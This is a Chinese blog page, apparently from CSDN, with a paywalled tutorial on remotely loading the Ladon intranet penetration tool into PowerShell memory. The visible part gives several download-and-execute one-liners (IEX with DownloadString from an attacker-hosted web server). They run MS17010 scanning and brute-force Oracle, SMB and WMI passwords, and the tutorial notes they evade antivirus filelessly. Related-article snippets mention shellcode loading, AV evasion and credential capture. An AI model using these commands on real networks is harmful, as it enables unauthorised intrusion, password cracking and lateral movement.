Ladon for PowerShell远程加载教程

最新推荐文章于 2021-09-20 17:25:09 发布

k8gege

最新推荐文章于 2021-09-20 17:25:09 发布

阅读量784

点赞数

分类专栏：内网渗透远程命令

本文链接：https://blog.csdn.net/k8gege/article/details/107878987

版权

本文档详细介绍了如何使用Ladon通过PowerShell进行远程加载，包括MS17010漏洞扫描、Oracle弱口令爆破、SmbScan、WmiScan、SmbHash和WmiHash爆破、反弹Shell等操作，实现内网横向移动的多个步骤和技术。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前言

本文仅是PowerLadon远程加载例子，并不代表只有这些功能。详情参考完整文档
脚本可直接远程内存加载使用无须免杀，或者有些人比较喜欢的所谓无文件渗透

完整文档：http://k8gege.org/Ladon

架设WEB服务器

使用命令 Ladon web 800 架设一个WEB服务器，用于远程下载脚本
实战可架设在VPS，或者架设在目标内网机器（因为有机器不能出网）
将脚本放在WEB目录下即可，当然大家也可以用IIS或APACHE搭建WEB

远程加载MS17010漏洞扫描

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.8/24 MS17010”

远程加载Oracle弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.141 OracleScan”

远程加载SmbScan 445端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’); Ladon 192.168.1.141 SmbScan”

远程加载WmiScan 135端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1’

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

k8gege

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Ladon的用法

谢公子的博客

05-24

5040

项目地址：https://github.com/k8gege/Ladon 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、

Ladon使用

weixin_47193338的博客

04-02

4019

一、简介 Ladon一款用于大型内网渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描。二、下载地址 https://codeload.github.com/k8gege/Ladon/zip/refs/heads/master 三、使用语句目标主机进行存活探测、MAC地址探测及主机名探测 Ladon.exe 192.168.123.0/24 ON...

参与评论您还未登录，请先登录后发表或查看评论

Powershell免杀（远程加载shellcode）笔记

jackslowf的博客

06-24

2348

原文链接远程加载的思路很简单，只需要将bin文件放到cs服务器上，利用远程读取shellcode的方式将恶意代码加载到内存执行即可。下面代码直接从uri读取字节数组（对的，没仔细看） # remoteshell.ps1 Set-StrictMode -Version 2 function get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_paramete

使用Powershell 远程执行

布谷鸟

03-03

4398

使用Powershell 远程执行

〖教程〗Ladon以指定用户权限运行程序或命令

K8哥哥

05-30

716

前言 Ladon内置Runas允许用户用其他权限运行指定的工具和程序。系统自带Runas命令需要交互式登陆，在webshell或不支持交互式的shell下使用麻烦。而Ladon的Runas则完美解决了以上问题，支持非交互式模拟登陆指定用户运行程序或命令。应用场景 1.本机用户密码验证（权限不够读不到帐密或HASH的情况下，验证用户是否使用某个已知密码） 2.SYSTEM权限降权，SYS权限下以用户身份执行命令，实现会话穿透，或访问特定用户的DBAPI加密数据 3.低权限用户提权，网络服务帐户或用户权限下使

Ladon简明教程 _ K8哥哥1

08-03

前言本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。完整文档：http://k8gege.org/Ladon (ht

〖教程〗Ladon迷你WEB服务器/一键内网HTTP服务器

K8哥哥

05-30

1403

前言你是否在为配置浏览器漏洞测试环境而烦恼，如配置Apache解析某种MIME测试某个漏洞又或者在为内网机器无WEB又无法通过其它协议传输文件到内网另一台不出网的主机烦恼还有些远程命令不支持多条语句，需要多次写入或HTTP一次性下载过去，显然都会选后者应用场景 1.浏览器0day漏洞测试或VPS上一键部署，无需安装配置Apache 2.内网HTTP协议文件传输，如内网目标不出网不允许其它协议通过 3.Office/Word/Pdf等漏洞或远程下载SCT、HTA等格式的CS Payload 4.IP追

Ladon内网渗透扫描器PowerShell版

K8哥哥

11-21

1242

程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路...

〖教程〗Ladon免杀/.NET免杀/Exe2Ps1/Ps12Exe

K8哥哥

07-16

1009

背景有很多人和我说exe被杀了怎么办？我问大家一句mimikaz被杀了你怎么办，是不是用它的PowerShell版或者转成其它格式来免，当然也可以直接修改源码免，但由于是公开的里面很多函数都被杀软盯得很死，加上很多人根本不是很懂代码，对一个公开并且很受欢迎的工具做源码免杀也是很花时间的。所以网上有不少免杀MZ的方法，EXE不能用时大家也会去用PowerShell版远程加载读取等，怎么到Ladon这你们就不知道怎么办了呢？不是一样的原理吗？难道是因为PS版体积较大？有些PY或GO写的工具先不说一般最小就2-

〖教程〗Ladon 0day通用执行命令DLL生成器-MS17010演示

K8哥哥

09-20

1726

Ladon8.9更新功能 20210920 [+]CmdDll Windows 0day漏洞通用DLL注入生成器，生成的DLL仅5KB，非常适合0day加载 2021.9.15 [u]webscan CS保留 [u]CmdDll 去除黑框 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞，Office文档利用模块影响版本: 包括Windows 7/8/8.1/10，Windows Server 2008/2008R2/2012/2012R2/2016

〖教程〗Ladon提权Win2016/Win10/MSSQL2016

K8哥哥

07-15

641

测试环境 Windows Server 2016 SQL: 13.0.1601.5 Microsoft Windows [Version 10.0.14393] Ladon本地用户权限提权网上找了些LPE，发现直接被Defender杀，病毒库更新至2021.1.19，Ladon没被杀，管理员UAC权限可通过BypassUac提权 MSSQL远程加载Ladon提权执行SQL查询权限为network service 远程内存加载PowerLadon提权 exec master..xp_cmdshell

PowerShell远程安装MSI安装包、EXE可执行程序的方法

01-20

尽管对IT管理员或者开发者来讲，这是一个很常见的任务，但是在网上能找到“远程安装一个msi包或者exe应用程序”的相关文档还是比较少的。甚至有人在一些论坛的评论中写道，这不可能实现。事实上还是可以的。我会在本文提供两段代码，分别负责远程安装MSI包和EXE可执行应用程序。一、安装MSI包使用PowerShell调用WMI对象，你可以执行下面的脚本来安装你的MSI安装包：代码如下:$box=”deviis01″ #this is the name of your server$product= [WMICLASS]”\\$box\ROOT\CIMV2:win32_Product”Write

〖教程〗Ladon内网扫描探测Exchange服务器

K8哥哥

07-15

388

工具内网、外网均可识别，大家不要误会 WhatCms识别通过Exchange页面特征识别 Ladon >= 7.3.2 用法 Ladon target WhatCms 例子单IP：Ladon 192.168.1.8 WhatCms C段：Ladon 192.168.1.1/c WhatCms B段：Ladon 192.168.1.1/b WhatCms ip列表同目录放ip txt 命令：Ladon whatcms 单个URL 命令：Ladon https://192.168.1.8 .

linux查看端口号

m0_49966615的博客

11-06

349

netstat -tunlp 查询所有端口 netstat -tunlp | grep 8080 查看8080端口 lsof -i:8080 查看8080端口

Ladon8.9扫描器简明教程/用法例子

K8哥哥

05-31

8743

前言本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。完整文档：http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机（IP、机器名、MAC地址、制造商） Ladon 192.168.1.8/24 OnlinePC 002 多协议扫描存活主机（IP、机器名、操作系统版本、开放服务） Ladon 192.168.1.8/24 OsScan 003 扫描存活主机 Ladon 192.168.1.8

〖教程〗Ladon SmbExec Hash传递远程执行命令

K8哥哥

09-15

628

Ladon8.8更新功能 [+]SmbExec NTLM-HASH非交互执行无回显 [u]GetInfo 新增Vmware虚拟机信息 [u]OsScan 新增识别Vigor Router路由器识别 [u]新增Xen\VBOX\Hybrid\Parallels虚拟机识别 [+]GetInfo 新增cmdkey、RrpLog、安装驱动、软件列表、最近访问文件等 [+]GetInfo 新增GUID、CPUID、硬盘ID、自启动后门检测(DLL却持、注册表等) [+]GetInfo2 新增WMI补丁信息获

Win32下ShellCode的远程加载

CSDN

05-28

5795

如下Python代码是一个基本的键盘记录器，它使用了一些Windows API函数和第三方库来监视键盘活动，并记录按键、窗口切换和剪贴板操作。然后，它检测按键是否为常规按键，如果是，则输出按键字符。如果按下的是Ctrl+V，它会尝试获取剪贴板的内容并输出。函数是一个回调函数，用于处理键盘事件。它首先检测是否切换了窗口，如果切换了窗口，就调用。最后，它输出进程相关的信息。接下来，代码定义了一些全局变量和函数，包括。函数用于获取当前前台窗口的进程信息，以及。首先，代码导入了一些必要的库，包括。

〖教程〗使用Ladon捕获Windonws登陆凭证

K8哥哥

08-16

314

版本 >= Ladon 6.6.3 原理使用PowerShell模仿Windowns登陆认证获取管理员密码，Ladon监听捕获基础认证密码。应用场景域控或管理员密码获取，当前权限很低又无法提权时。（有权限直接读明文或HASH） Ladon监听该功能模仿了MSF里的基础认证监听模块，但最大的优势在于无需占用系统大量空间和内存。可直接部署在目标内网或VPS上，也无需复杂命令，直接输以下命令一键监听自动捕获密码。其它用途：http://k8gege.org/Ladon/webser.html L